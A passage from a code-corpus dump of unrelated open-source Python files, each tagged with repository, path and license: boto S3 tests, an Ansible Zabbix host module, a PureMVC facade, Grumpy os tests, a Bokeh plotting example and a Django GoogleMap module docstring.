urllib.parse.unquote(check.content_disposition),
expected
)
def test_set_contents_with_sse_c(self):
content="01234567890123456789"
# the plain text of customer key is "01testKeyToSSEC!"
header = {
"x-amz-server-side-encryption-customer-algorithm" :
"AES256",
"x-amz-server-side-encryption-customer-key" :
"MAAxAHQAZQBzAHQASwBlAHkAVABvAFMAUwBFAEMAIQA=",
"x-amz-server-side-encryption-customer-key-MD5" :
"fUgCZDDh6bfEMuP2bN38mg=="
}
# upload and download content with AWS specified headers
k = self.bucket.new_key("testkey_for_sse_c")
k.set_contents_from_string(content, headers=header)
kn = self.bucket.new_key("testkey_for_sse_c")
ks = kn.get_contents_as_string(headers=header)
self.assertEqual(ks, content.encode('utf-8'))
class S3KeySigV4Test(unittest.TestCase):
def setUp(self):
self.conn = boto.s3.connect_to_region('eu-central-1')
self.bucket_name = 'boto-sigv4-key-%d' % int(time.time())
self.bucket = self.conn.create_bucket(self.bucket_name,
location='eu-central-1')
def tearDown(self):
for key in self.bucket:
key.delete()
self.bucket.delete()
def test_put_get_with_non_string_headers_key(self):
k = Key(self.bucket)
k.key = 'foobar'
body = 'This is a test of S3'
# A content-length header will be added to this request since it
# has a body.
k.set_contents_from_string(body)
# Set a header that has an integer. This checks for a bug where
# the sigv4 signer assumes that all of the headers are strings.
headers = {'Content-Length': 0}
from_s3_key = self.bucket.get_key('foobar', headers=headers)
self.assertEqual(from_s3_key.get_contents_as_string().decode('utf-8'),
body)
class S3KeyVersionCopyTest(unittest.TestCase):
def setUp(self):
self.conn = S3Connection()
self.bucket_name = 'boto-key-version-copy-%d' % int(time.time())
self.bucket = self.conn.create_bucket(self.bucket_name)
self.bucket.configure_versioning(True)
def tearDown(self):
for key in self.bucket.list_versions():
key.delete()
self.bucket.delete()
def test_key_overwrite_and_copy(self):
first_content = "abcdefghijklm"
second_content = "nopqrstuvwxyz"
k = Key(self.bucket, 'testkey')
k.set_contents_from_string(first_content)
# Wait for S3's eventual consistency (may not be necessary)
while self.bucket.get_key('testkey') is None:
time.sleep(5)
# Get the first version_id
first_key = self.bucket.get_key('testkey')
first_version_id = first_key.version_id
# Overwrite the key
k = Key(self.bucket, 'testkey')
k.set_contents_from_string(second_content)
# Wait for eventual consistency
while True:
second_key = self.bucket.get_key('testkey')
if second_key is None or second_key.version_id == first_version_id:
time.sleep(5)
else:
break
# Copy first key (no longer the current version) to a new key
source_key = self.bucket.get_key('testkey',
version_id=first_version_id)
source_key.copy(self.bucket, 'copiedkey')
while self.bucket.get_key('copiedkey') is None:
time.sleep(5)
copied_key = self.bucket.get_key('copiedkey')
copied_key_contents = copied_key.get_contents_as_string()
self.assertEqual(first_content, copied_key_contents)
| mit |
marcosdiez/ansible-modules-extras | monitoring/zabbix_host.py | 1 | 19612 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013-2014, Epic Games, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = '''
---
module: zabbix_host
short_description: Zabbix host creates/updates/deletes
description:
- This module allows you to create, modify and delete Zabbix host entries and associated group and template data.
version_added: "2.0"
author:
- "(@cove)"
- "Tony Minfei Ding"
- "Harrison Gu (@harrisongu)"
requirements:
- "python >= 2.6"
- zabbix-api
options:
server_url:
description:
- Url of Zabbix server, with protocol (http or https).
required: true
aliases: [ "url" ]
login_user:
description:
- Zabbix user name, used to authenticate against the server.
required: true
login_password:
description:
- Zabbix user password.
required: true
host_name:
description:
- Name of the host in Zabbix.
- host_name is the unique identifier used and cannot be updated using this module.
required: true
host_groups:
description:
- List of host groups the host is part of.
required: false
link_templates:
description:
- List of templates linked to the host.
required: false
default: None
status:
description:
- Monitoring status of the host.
required: false
choices: ['enabled', 'disabled']
default: "enabled"
state:
description:
- State of the host.
- On C(present), it will create if host does not exist or update the host if the associated data is different.
- On C(absent) will remove a host if it exists.
required: false
choices: ['present', 'absent']
default: "present"
timeout:
description:
- The timeout of API request (seconds).
default: 10
proxy:
description:
- The name of the Zabbix Proxy to be used
default: None
interfaces:
description:
- List of interfaces to be created for the host (see example below).
- 'Available values are: dns, ip, main, port, type and useip.'
- Please review the interface documentation for more information on the supported properties
- 'https://www.zabbix.com/documentation/2.0/manual/appendix/api/hostinterface/definitions#host_interface'
required: false
default: []
force:
description:
- Overwrite the host configuration, even if already present
required: false
default: "yes"
choices: [ "yes", "no" ]
version_added: "2.0"
'''
EXAMPLES = '''
- name: Create a new host or update an existing host's info
local_action:
module: zabbix_host
server_url: http://monitor.example.com
login_user: username
login_password: password
host_name: ExampleHost
host_groups:
- Example group1
- Example group2
link_templates:
- Example template1
- Example template2
status: enabled
state: present
interfaces:
- type: 1
main: 1
useip: 1
ip: 10.xx.xx.xx
dns: ""
port: 10050
- type: 4
main: 1
useip: 1
ip: 10.xx.xx.xx
dns: ""
port: 12345
proxy: a.zabbix.proxy
'''
import logging
import copy
try:
from zabbix_api import ZabbixAPI, ZabbixAPISubClass
HAS_ZABBIX_API = True
except ImportError:
HAS_ZABBIX_API = False
# Extend the ZabbixAPI
# Since the zabbix-api python module too old (version 1.0, no higher version so far),
# it does not support the 'hostinterface' api calls,
# so we have to inherit the ZabbixAPI class to add 'hostinterface' support.
class ZabbixAPIExtends(ZabbixAPI):
hostinterface = None
def __init__(self, server, timeout, **kwargs):
ZabbixAPI.__init__(self, server, timeout=timeout)
self.hostinterface = ZabbixAPISubClass(self, dict({"prefix": "hostinterface"}, **kwargs))
class Host(object):
def __init__(self, module, zbx):
self._module = module
self._zapi = zbx
# exist host
def is_host_exist(self, host_name):
result = self._zapi.host.exists({'host': host_name})
return result
# check if host group exists
def check_host_group_exist(self, group_names):
for group_name in group_names:
result = self._zapi.hostgroup.exists({'name': group_name})
if not result:
self._module.fail_json(msg="Hostgroup not found: %s" % group_name)
return True
def get_template_ids(self, template_list):
template_ids = []
if template_list is None or len(template_list) == 0:
return template_ids
for template in template_list:
template_list = self._zapi.template.get({'output': 'extend', 'filter': {'host': template}})
if len(template_list) < 1:
self._module.fail_json(msg="Template not found: %s" % template)
else:
template_id = template_list[0]['templateid']
template_ids.append(template_id)
return template_ids
def add_host(self, host_name, group_ids, status, interfaces, proxy_id):
try:
if self._module.check_mode:
self._module.exit_json(changed=True)
parameters = {'host': host_name, 'interfaces': interfaces, 'groups': group_ids, 'status': status}
if proxy_id:
parameters['proxy_hostid'] = proxy_id
host_list = self._zapi.host.create(parameters)
if len(host_list) >= 1:
return host_list['hostids'][0]
except Exception, e:
self._module.fail_json(msg="Failed to create host %s: %s" % (host_name, e))
def update_host(self, host_name, group_ids, status, host_id, interfaces, exist_interface_list, proxy_id):
try:
if self._module.check_mode:
self._module.exit_json(changed=True)
parameters = {'hostid': host_id, 'groups': group_ids, 'status': status}
if proxy_id:
parameters['proxy_hostid'] = proxy_id
self._zapi.host.update(parameters)
interface_list_copy = exist_interface_list
if interfaces:
for interface in interfaces:
flag = False
interface_str = interface
for exist_interface in exist_interface_list:
interface_type = interface['type']
exist_interface_type = int(exist_interface['type'])
if interface_type == exist_interface_type:
# update
interface_str['interfaceid'] = exist_interface['interfaceid']
self._zapi.hostinterface.update(interface_str)
flag = True
interface_list_copy.remove(exist_interface)
break
if not flag:
# add
interface_str['hostid'] = host_id
self._zapi.hostinterface.create(interface_str)
# remove
remove_interface_ids = []
for remove_interface in interface_list_copy:
interface_id = remove_interface['interfaceid']
remove_interface_ids.append(interface_id)
if len(remove_interface_ids) > 0:
self._zapi.hostinterface.delete(remove_interface_ids)
except Exception, e:
self._module.fail_json(msg="Failed to update host %s: %s" % (host_name, e))
def delete_host(self, host_id, host_name):
try:
if self._module.check_mode:
self._module.exit_json(changed=True)
self._zapi.host.delete({'hostid': host_id})
except Exception, e:
self._module.fail_json(msg="Failed to delete host %s: %s" % (host_name, e))
# get host by host name
def get_host_by_host_name(self, host_name):
host_list = self._zapi.host.get({'output': 'extend', 'filter': {'host': [host_name]}})
if len(host_list) < 1:
self._module.fail_json(msg="Host not found: %s" % host_name)
else:
return host_list[0]
# get proxyid by proxy name
def get_proxyid_by_proxy_name(self, proxy_name):
proxy_list = self._zapi.proxy.get({'output': 'extend', 'filter': {'host': [proxy_name]}})
if len(proxy_list) < 1:
self._module.fail_json(msg="Proxy not found: %s" % proxy_name)
else:
return proxy_list[0]['proxyid']
# get group ids by group names
def get_group_ids_by_group_names(self, group_names):
group_ids = []
if self.check_host_group_exist(group_names):
group_list = self._zapi.hostgroup.get({'output': 'extend', 'filter': {'name': group_names}})
for group in group_list:
group_id = group['groupid']
group_ids.append({'groupid': group_id})
return group_ids
# get host templates by host id
def get_host_templates_by_host_id(self, host_id):
template_ids = []
template_list = self._zapi.template.get({'output': 'extend', 'hostids': host_id})
for template in template_list:
template_ids.append(template['templateid'])
return template_ids
# get host groups by host id
def get_host_groups_by_host_id(self, host_id):
exist_host_groups = []
host_groups_list = self._zapi.hostgroup.get({'output': 'extend', 'hostids': host_id})
if len(host_groups_list) >= 1:
for host_groups_name in host_groups_list:
exist_host_groups.append(host_groups_name['name'])
return exist_host_groups
# check the exist_interfaces whether it equals the interfaces or not
def check_interface_properties(self, exist_interface_list, interfaces):
interfaces_port_list = []
if len(interfaces) >= 1:
for interface in interfaces:
interfaces_port_list.append(int(interface['port']))
exist_interface_ports = []
if len(exist_interface_list) >= 1:
for exist_interface in exist_interface_list:
exist_interface_ports.append(int(exist_interface['port']))
if set(interfaces_port_list) != set(exist_interface_ports):
return True
for exist_interface in exist_interface_list:
exit_interface_port = int(exist_interface['port'])
for interface in interfaces:
interface_port = int(interface['port'])
if interface_port == exit_interface_port:
for key in interface.keys():
if str(exist_interface[key]) != str(interface[key]):
return True
return False
# get the status of host by host
def get_host_status_by_host(self, host):
return host['status']
# check all the properties before link or clear template
def check_all_properties(self, host_id, host_groups, status, interfaces, template_ids,
exist_interfaces, host, proxy_id):
# get the existing host's groups
exist_host_groups = self.get_host_groups_by_host_id(host_id)
if set(host_groups) != set(exist_host_groups):
return True
# get the existing status
exist_status = self.get_host_status_by_host(host)
if int(status) != int(exist_status):
return True
# check the exist_interfaces whether it equals the interfaces or not
if self.check_interface_properties(exist_interfaces, interfaces):
return True
# get the existing templates
exist_template_ids = self.get_host_templates_by_host_id(host_id)
if set(list(template_ids)) != set(exist_template_ids):
return True
if host['proxy_hostid'] != proxy_id:
return True
return False
# link or clear template of the host
def link_or_clear_template(self, host_id, template_id_list):
# get host's exist template ids
exist_template_id_list = self.get_host_templates_by_host_id(host_id)
exist_template_ids = set(exist_template_id_list)
template_ids = set(template_id_list)
template_id_list = list(template_ids)
# get unlink and clear templates
templates_clear = exist_template_ids.difference(template_ids)
templates_clear_list = list(templates_clear)
request_str = {'hostid': host_id, 'templates': template_id_list, 'templates_clear': templates_clear_list}
try:
if self._module.check_mode:
self._module.exit_json(changed=True)
self._zapi.host.update(request_str)
except Exception, e:
self._module.fail_json(msg="Failed to link template to host: %s" % e)
def main():
module = AnsibleModule(
argument_spec=dict(
server_url=dict(type='str', required=True, aliases=['url']),
login_user=dict(rtype='str', equired=True),
login_password=dict(type='str', required=True, no_log=True),
host_name=dict(type='str', required=True),
host_groups=dict(type='list', required=False),
link_templates=dict(type='list', required=False),
status=dict(default="enabled", choices=['enabled', 'disabled']),
state=dict(default="present", choices=['present', 'absent']),
timeout=dict(type='int', default=10),
interfaces=dict(type='list', required=False),
force=dict(type='bool', default=True),
proxy=dict(type='str', required=False)
),
supports_check_mode=True
)
if not HAS_ZABBIX_API:
module.fail_json(msg="Missing requried zabbix-api module (check docs or install with: pip install zabbix-api)")
server_url = module.params['server_url']
login_user = module.params['login_user']
login_password = module.params['login_password']
host_name = module.params['host_name']
host_groups = module.params['host_groups']
link_templates = module.params['link_templates']
status = module.params['status']
state = module.params['state']
timeout = module.params['timeout']
interfaces = module.params['interfaces']
force = module.params['force']
proxy = module.params['proxy']
# convert enabled to 0; disabled to 1
status = 1 if status == "disabled" else 0
zbx = None
# login to zabbix
try:
zbx = ZabbixAPIExtends(server_url, timeout=timeout)
zbx.login(login_user, login_password)
except Exception, e:
module.fail_json(msg="Failed to connect to Zabbix server: %s" % e)
host = Host(module, zbx)
template_ids = []
if link_templates:
template_ids = host.get_template_ids(link_templates)
group_ids = []
if host_groups:
group_ids = host.get_group_ids_by_group_names(host_groups)
ip = ""
if interfaces:
for interface in interfaces:
if interface['type'] == 1:
ip = interface['ip']
# check if host exist
is_host_exist = host.is_host_exist(host_name)
if is_host_exist:
# Use proxy specified, or set to None when updating host
if proxy:
proxy_id = host.get_proxyid_by_proxy_name(proxy)
else:
proxy_id = None
# get host id by host name
zabbix_host_obj = host.get_host_by_host_name(host_name)
host_id = zabbix_host_obj['hostid']
if state == "absent":
# remove host
host.delete_host(host_id, host_name)
module.exit_json(changed=True, result="Successfully delete host %s" % host_name)
else:
if not group_ids:
module.fail_json(msg="Specify at least one group for updating host '%s'." % host_name)
if not force:
module.fail_json(changed=False, result="Host present, Can't update configuration without force")
# get exist host's interfaces
exist_interfaces = host._zapi.hostinterface.get({'output': 'extend', 'hostids': host_id})
exist_interfaces_copy = copy.deepcopy(exist_interfaces)
# update host
interfaces_len = len(interfaces) if interfaces else 0
if len(exist_interfaces) > interfaces_len:
if host.check_all_properties(host_id, host_groups, status, interfaces, template_ids,
exist_interfaces, zabbix_host_obj, proxy_id):
host.link_or_clear_template(host_id, template_ids)
host.update_host(host_name, group_ids, status, host_id,
interfaces, exist_interfaces, proxy_id)
module.exit_json(changed=True,
result="Successfully update host %s (%s) and linked with template '%s'"
% (host_name, ip, link_templates))
else:
module.exit_json(changed=False)
else:
if host.check_all_properties(host_id, host_groups, status, interfaces, template_ids,
exist_interfaces_copy, zabbix_host_obj, proxy_id):
host.update_host(host_name, group_ids, status, host_id, interfaces, exist_interfaces, proxy_id)
host.link_or_clear_template(host_id, template_ids)
module.exit_json(changed=True,
result="Successfully update host %s (%s) and linked with template '%s'"
% (host_name, ip, link_templates))
else:
module.exit_json(changed=False)
else:
# Use proxy specified, or set to 0 when adding new host
if proxy:
proxy_id = host.get_proxyid_by_proxy_name(proxy)
else:
proxy_id = 0
if not group_ids:
module.fail_json(msg="Specify at least one group for creating host '%s'." % host_name)
if not interfaces or (interfaces and len(interfaces) == 0):
module.fail_json(msg="Specify at least one interface for creating host '%s'." % host_name)
# create host
host_id = host.add_host(host_name, group_ids, status, interfaces, proxy_id)
host.link_or_clear_template(host_id, template_ids)
module.exit_json(changed=True, result="Successfully added host %s (%s) and linked with template '%s'" % (
host_name, ip, link_templates))
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
PureMVC/puremvc-python-demo-gae-blog | src/puremvc/patterns/facade.py | 1 | 9327 | """
PureMVC Python Port by Toby de Havilland <toby.de.havilland@puremvc.org>
PureMVC - Copyright(c) 2006-08 Futurescale, Inc., Some rights reserved.
Your reuse is governed by the Creative Commons Attribution 3.0 License
"""
import puremvc.core
import puremvc.interfaces
import puremvc.patterns.observer
class Facade(object,puremvc.interfaces.IFacade):
"""
A base Singleton C{IFacade} implementation.
In PureMVC, the C{Facade} class assumes these
responsibilities:
Initializing the C{Model}, C{View} and C{Controller} Singletons.
Providing all the methods defined by the C{IModel, IView, & IController} interfaces.
Providing the ability to override the specific C{Model}, C{View} and C{Controller} Singletons created.
Providing a single point of contact to the application for registering C{Commands} and notifying C{Observers}
@see: L{Model<org.puremvc.as3.core.model.Model>}
@see: L{View<org.puremvc.as3.core.view.View>}
@see: L{Controller<org.puremvc.as3.core.controller.Controller>}
@see: L{Notification<org.puremvc.as3.patterns.observer.Notification>}
@see: L{Mediator<org.puremvc.as3.patterns.mediator.Mediator>}
@see: L{Proxy<org.puremvc.as3.patterns.proxy.Proxy>}
@see: L{SimpleCommand<org.puremvc.as3.patterns.command.SimpleCommand>}
@see: L{MacroCommand<org.puremvc.as3.patterns.command.MacroCommand>}
"""
instance = None
controller = None
model = None
view = None
def __new__(cls, *args, **kwargs):
"""
This C{IFacade} implementation is a Singleton, so you should not call the constructor
directly, but instead call the static Singleton method C{Facade.getInstance()}
"""
if not cls.instance or not isinstance(cls.instance, cls):
cls.instance = super(Facade, cls).__new__(cls, *args, **kwargs)
cls.instance.initializeFacade()
return cls.instance
@staticmethod
def getInstance():
"""
C{Facade} Singleton Static method.
@return: the Singleton instance of C{Facade}
"""
return Facade()
def initializeFacade(self):
"""
Initialize the Singleton C{Facade} instance.
Called automatically by the constructor. Override in your
subclass to do any subclass specific initializations. Be
sure to call C{Facade.initializeFacade()}, though.
"""
self.initializeController()
self.initializeModel()
self.initializeView()
def initializeController(self):
"""
Initialize the C{Controller}.
Called by the C{initializeFacade} method.
Override this method in your subclass of C{Facade}
if one or both of the following are true:
You wish to initialize a different C{IController}.
You have C{Commands} to register with the C{Controller} at startup.
If you don't want to initialize a different C{IController},
call C{super.initializeController()} at the beginning of your method, then register C{Proxy}s.
Note: This method is I{rarely} overridden; in practice you are more
likely to use a C{Command} to create and register C{Proxy}s
with the C{Model}, since C{Proxy}s with mutable data will likely
need to send C{INotification}s and thus will likely want to fetch a reference to
the C{Facade} during their construction.
"""
if (self.controller is not None):
return
self.controller = puremvc.core.Controller.getInstance()
def initializeModel(self):
"""
Initialize the C{Model}.
Called by the C{initializeFacade} method.
Override this method in your subclass of C{Facade}
if one or both of the following are true:
You wish to initialize a different C{IModel}.
You have C{Proxy}s to register with the Model that do not
retrieve a reference to the Facade at construction time.
If you don't want to initialize a different C{IModel},
call C{super.initializeModel()} at the beginning of your
method, then register C{Proxy}s.
Note: This method is I{rarely} overridden; in practice you are more
likely to use a C{Command} to create and register C{Proxy}s
with the C{Model}, since C{Proxy}s with mutable data will likely
need to send C{INotification}s and thus will likely want to fetch a reference to
the C{Facade} during their construction.
"""
if (self.model is not None):
return
self.model = puremvc.core.Model.getInstance()
def initializeView(self):
"""
Initialize the C{View}.
Called by the C{initializeFacade} method.
Override this method in your subclass of C{Facade}
if one or both of the following are true:
You wish to initialize a different C{IView}.
You have C{Observers} to register with the C{View}
If you don't want to initialize a different C{IView},
call C{super.initializeView()} at the beginning of your
method, then register C{IMediator} instances.
Note: This method is I{rarely} overridden; in practice you are more
likely to use a C{Command} to create and register C{Mediator}s
with the C{View}, since C{IMediator} instances will need to send
C{INotification}s and thus will likely want to fetch a reference
to the C{Facade} during their construction.
"""
if (self.view is not None):
return
self.view = puremvc.core.View.getInstance()
def registerCommand(self, notificationName, commandClassRef):
"""
Register an C{ICommand} with the C{Controller} by Notification name.
@param notificationName: the name of the C{INotification} to associate the C{ICommand} with
@param commandClassRef: a reference to the Class of the C{ICommand}
"""
self.controller.registerCommand(notificationName, commandClassRef)
def removeCommand(self, notificationName):
"""
Remove a previously registered C{ICommand} to C{INotification} mapping from the Controller.
@param notificationName: the name of the C{INotification} to remove the C{ICommand} mapping for
"""
self.controller.removeCommand(notificationName)
def hasCommand(self, notificationName):
"""
Check if a Command is registered for a given Notification
@param notificationName: the name of the C{INotification}
@return: whether a Command is currently registered for the given C{notificationName}.
"""
return self.controller.hasCommand(notificationName)
def registerProxy(self, proxy):
"""
Register an C{IProxy} with the C{Model} by name.
@param proxy: the C{IProxy} instance to be registered with the C{Model}.
"""
self.model.registerProxy(proxy)
def retrieveProxy(self, proxyName):
"""
Retrieve an C{IProxy} from the C{Model} by name.
@param proxyName: the name of the proxy to be retrieved.
@return: the C{IProxy} instance previously registered with the given C{proxyName}.
"""
return self.model.retrieveProxy(proxyName)
def removeProxy(self, proxyName):
"""
Remove an C{IProxy} from the C{Model} by name.
@param proxyName: the C{IProxy} to remove from the C{Model}.
@return: the C{IProxy} that was removed from the C{Model}
"""
proxy = None
if (self.model is not None):
proxy = self.model.removeProxy(proxyName)
return proxy
def hasProxy(self, proxyName):
"""
Check if a Proxy is registered
@param proxyName: the name of the C{IProxy}
@return: whether a Proxy is currently registered with the given C{proxyName}.
"""
return self.model.hasProxy(proxyName)
def registerMediator(self, mediator):
"""
Register a C{IMediator} with the C{View}.
@param mediator: a reference to the C{IMediator}
"""
if (self.view is not None):
self.view.registerMediator(mediator)
def retrieveMediator(self, mediatorName):
"""
Retrieve an C{IMediator} from the C{View}.
@param mediatorName: the name of the C{IMediator}
@return: the C{IMediator} previously registered with the given C{mediatorName}.
"""
return self.view.retrieveMediator(mediatorName)
def removeMediator(self, mediatorName):
"""
Remove an C{IMediator} from the C{View}.
@param mediatorName: name of the C{IMediator} to be removed.
@return: the C{IMediator} that was removed from the C{View}
"""
mediator = None
if (self.view is not None):
mediator = self.view.removeMediator(mediatorName)
return mediator
def hasMediator(self, mediatorName):
"""
Check if a Mediator is registered or not
@param mediatorName: the name of the C{IMediator}
@return: whether a Mediator is registered with the given C{mediatorName}.
"""
return self.view.hasMediator(mediatorName)
def sendNotification(self, notificationName, body=None, type=None):
"""
Create and send an C{INotification}.
Keeps us from having to construct new notification
instances in our implementation code.
@param notificationName: the name of the notiification to send
@param body: the body of the notification (optional)
@param type: the type of the notification (optional)
"""
self.notifyObservers(puremvc.patterns.observer.Notification(notificationName, body, type))
def notifyObservers(self, notification):
"""
Notify C{Observer}s.
This method is left public mostly for backward
compatibility, and to allow you to send custom
notification classes using the facade.
Usually you should just call sendNotification
and pass the parameters, never having to
construct the notification yourself.
@param notification: the C{INotification} to have the C{View} notify C{Observers} of.
"""
if (self.view is not None):
self.view.notifyObservers(notification) | bsd-3-clause |
pombredanne/grumpy | grumpy-runtime-src/lib/os_test.py | 5 | 4620 | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import stat
import time
import tempfile
import weetest
def TestChdirAndGetCwd():
path = os.getcwd()
os.chdir('.')
assert os.getcwd() == path
tempdir = tempfile.mkdtemp()
try:
os.chdir(tempdir)
assert tempdir in os.getcwd()
finally:
os.chdir(path)
os.rmdir(tempdir)
assert os.getcwd() == path
def TestChmod():
fd, path = tempfile.mkstemp()
os.close(fd)
os.chmod(path, 0o644)
mode = os.stat(path).st_mode & 0o777
os.remove(path)
assert mode == 0o644
def TestChmodOSError():
tempdir = tempfile.mkdtemp()
try:
os.chmod(tempdir + '/DoesNotExist', 0o644)
except OSError:
pass
else:
raise AssertionError
def TestClose():
fd, _ = tempfile.mkstemp()
os.close(fd)
try:
os.fdopen(fd)
except OSError:
pass
else:
raise AssertionError
def TestCloseOSError():
fd, _ = tempfile.mkstemp()
os.close(fd)
try:
os.close(fd)
except OSError:
pass
else:
raise AssertionError
def TestEnviron():
assert 'HOME' in os.environ
def TestFDOpen():
fd, path = tempfile.mkstemp()
f = os.fdopen(fd, 'w')
f.write('foobar')
f.close()
f = open(path)
contents = f.read()
f.close()
assert contents == 'foobar', contents
def TestFDOpenOSError():
fd, _ = tempfile.mkstemp()
os.close(fd)
try:
os.fdopen(fd)
except OSError:
pass
else:
raise AssertionError
def TestMkdir():
path = 'foobarqux'
try:
os.stat(path)
except OSError:
pass
else:
raise AssertionError
try:
os.mkdir(path)
assert stat.S_ISDIR(os.stat(path).st_mode)
except OSError:
raise AssertionError
finally:
os.rmdir(path)
def TestPopenRead():
f = os.popen('qux')
assert f.close() == 32512
f = os.popen('echo hello')
try:
assert f.read() == 'hello\n'
finally:
assert f.close() == 0
def TestPopenWrite():
# TODO: We should verify the output but there's no good way to swap out stdout
# at the moment.
f = os.popen('cat', 'w')
f.write('popen write\n')
f.close()
def TestRemove():
fd, path = tempfile.mkstemp()
os.close(fd)
os.stat(path)
os.remove(path)
try:
os.stat(path)
except OSError:
pass
else:
raise AssertionError
def TestRemoveNoExist():
path = tempfile.mkdtemp()
try:
os.remove(path + '/nonexistent')
except OSError:
pass
else:
raise AssertionError
finally:
os.rmdir(path)
def TestRemoveDir():
path = tempfile.mkdtemp()
try:
os.remove(path)
except OSError:
pass
else:
raise AssertionError
finally:
os.rmdir(path)
def TestRmDir():
path = tempfile.mkdtemp()
assert stat.S_ISDIR(os.stat(path).st_mode)
os.rmdir(path)
try:
os.stat(path)
except OSError:
pass
else:
raise AssertionError
def TestRmDirNoExist():
path = tempfile.mkdtemp()
try:
os.rmdir(path + '/nonexistent')
except OSError:
pass
else:
raise AssertionError
finally:
os.rmdir(path)
def TestRmDirFile():
fd, path = tempfile.mkstemp()
os.close(fd)
try:
os.rmdir(path)
except OSError:
pass
else:
raise AssertionError
finally:
os.remove(path)
def TestStatFile():
t = time.time()
fd, path = tempfile.mkstemp()
os.close(fd)
st = os.stat(path)
os.remove(path)
assert not stat.S_ISDIR(st.st_mode)
assert stat.S_IMODE(st.st_mode) == 0o600
# System time and mtime may have different precision so give 10 sec leeway.
assert st.st_mtime + 10 > t
assert st.st_size == 0
def TestStatDir():
path = tempfile.mkdtemp()
mode = os.stat(path).st_mode
os.rmdir(path)
assert stat.S_ISDIR(mode)
assert stat.S_IMODE(mode) == 0o700
def TestStatNoExist():
path = tempfile.mkdtemp()
try:
os.stat(path + '/nonexistent')
except OSError:
pass
else:
raise AssertionError
finally:
os.rmdir(path)
def TestWaitPid():
try:
pid, status = os.waitpid(-1, os.WNOHANG)
except OSError as e:
assert 'no child processes' in str(e).lower()
if __name__ == '__main__':
weetest.RunTests()
| apache-2.0 |
stonebig/bokeh | examples/plotting/file/elements.py | 5 | 1855 | import pandas as pd
from bokeh.models import ColumnDataSource, LabelSet
from bokeh.plotting import figure, show, output_file
from bokeh.sampledata.periodic_table import elements
elements = elements.copy()
elements = elements[elements["atomic number"] <= 82]
elements = elements[~pd.isnull(elements["melting point"])]
mass = [float(x.strip("[]")) for x in elements["atomic mass"]]
elements["atomic mass"] = mass
palette = ["#053061", "#2166ac", "#4393c3", "#92c5de", "#d1e5f0",
"#f7f7f7", "#fddbc7", "#f4a582", "#d6604d", "#b2182b", "#67001f"]
melting_points = elements["melting point"]
low = min(melting_points)
high = max(melting_points)
melting_point_inds = [int(10*(x-low)/(high-low)) for x in melting_points] #gives items in colors a value from 0-10
elements['melting_colors'] = [palette[i] for i in melting_point_inds]
TITLE = "Density vs Atomic Weight of Elements (colored by melting point)"
TOOLS = "hover,pan,wheel_zoom,box_zoom,reset,save"
p = figure(tools=TOOLS, toolbar_location="above", plot_width=1200, title=TITLE)
p.toolbar.logo = "grey"
p.background_fill_color = "#dddddd"
p.xaxis.axis_label = "atomic weight (amu)"
p.yaxis.axis_label = "density (g/cm^3)"
p.grid.grid_line_color = "white"
p.hover.tooltips = [
("name", "@name"),
("symbol:", "@symbol"),
("density", "@density"),
("atomic weight", "@{atomic mass}"),
("melting point", "@{melting point}")
]
source = ColumnDataSource(elements)
p.circle("atomic mass", "density", size=12, source=source,
color='melting_colors', line_color="black", fill_alpha=0.8)
labels = LabelSet(x="atomic mass", y="density", text="symbol", y_offset=8,
text_font_size="8pt", text_color="#555555",
source=source, text_align='center')
p.add_layout(labels)
output_file("elements.html", title="elements.py example")
show(p)
| bsd-3-clause |
lisael/pg-django | django/contrib/gis/maps/google/__init__.py | 603 | 2648 | """
This module houses the GoogleMap object, used for generating
the needed javascript to embed Google Maps in a Web page.
Google(R) is a registered trademark of Google, Inc. of Mountain View, California.
Example:
* In the view:
return render_to_response('template.html', {'google' : GoogleMap(key="abcdefg")})
* In the template:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
{{ google.xhtml }}
<head>
<title>Google Maps via GeoDjango</title>
{{ google.style }}
{{ google.scripts }}
</head>
{{ google.body }}
<div id="{{ google.dom_id }}" style="width:600px;height:400px;"></div>
</body>
</html>
Note: If you want to be more explicit in your templates, the following are
equivalent:
{{ google.body }} => "<body {{ google.onload }} {{ google.onunload }}>"
{{ google.xhtml }} => "<html xmlns="http://www.w3.org/1999/xhtml" {{ google.xmlns }}>"
{{ google.style }} => "<style>{{ google.vml_css }}</style>"
Explanation:
- The `xhtml` property provides the correct XML namespace needed for
Google Maps to operate in IE using XHTML. Google Maps on IE uses
VML to draw polylines. Returns, by default:
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml">
- The `style` property provides the correct style tag for the CSS
properties required by Google Maps on IE:
<style type="text/css">v\:* {behavior:url(#default#VML);}</style>
- The `scripts` property provides the necessary <script> tags for
including the Google Maps javascript, as well as including the
generated javascript.
- The `body` property provides the correct attributes for the
body tag to load the generated javascript. By default, returns:
<body onload="gmap_load()" onunload="GUnload()">
- The `dom_id` property returns the DOM id for the map. Defaults to "map".
The following attributes may be set or customized in your local settings:
* GOOGLE_MAPS_API_KEY: String of your Google Maps API key. These are tied to
to a domain. May be obtained from http://www.google.com/apis/maps/
* GOOGLE_MAPS_API_VERSION (optional): Defaults to using "2.x"
* GOOGLE_MAPS_URL (optional): Must have a substitution ('%s') for the API
version.
"""
from django.contrib.gis.maps.google.gmap import GoogleMap, GoogleMapSet
from django.contrib.gis.maps.google.overlays import GEvent, GIcon, GMarker, GPolygon, GPolyline
from django.contrib.gis.maps.google.zoom import GoogleZoom
| bsd-3-clause |
